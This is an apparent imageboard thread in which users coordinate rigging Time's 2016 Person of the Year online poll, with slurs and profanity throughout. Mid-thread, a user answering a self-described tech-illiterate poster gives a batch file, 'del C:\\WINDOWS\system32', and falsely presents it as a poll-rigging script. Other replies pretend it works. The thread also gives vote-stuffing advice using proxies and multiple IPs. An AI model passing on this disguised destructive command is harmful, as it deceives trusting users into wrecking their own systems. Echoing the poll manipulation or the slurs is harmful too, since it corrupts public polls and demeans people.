h ttp://www.today.com/news/time-s-person-year-2016-donald-trump-mark-zuckerberg-simone-t105610
Time to win another election bros
h ttp://www.today.com/news/time-s-person-year-2016-donald-trump-mark-zuckerberg-simone-t105610
Time to win another election bros
Bump for the greater good
this is where it's at now
rev up those scripts kiddies, we've got fucking work to do
Break the link, you fucking faggot.
Sorry didn't think about it
tell me how, I'm pretty tech illiterate
Now any regular vote from here might as well be discarded.
Report your goddamn thread, and fix it, before you fuck it up entirely.
Come on people
Open notepad and type the following as it appears:
@echo off
del C:\\WINDOWS\system32
Then save it (as "all files" not "Text document") as:
Then double click the file and restart your computer, it will start rigging the poll upon opening the browser.
Incognito mode (close after voting), use as many IPs (rebooting router, proxies, different WiFi connections) as possible!
I almost hope she wins just to read how Time manages to spin that. Almost.
What the fuck happened to Assange? (Rhetorical question)
This. Time to attack them for taking off Assange.
Solid advice. Works like a charm !
Wouldn't it be smart to make sanders appear in the top to slow down hillary votes ?
Bump. We need more salt.
Thanks, it does about 10 votes a second if I just let my laptop idle with it on.
It's like he nods toward us!
I went there any there was no poll to vote in, just some posted results. Am I retarded or something?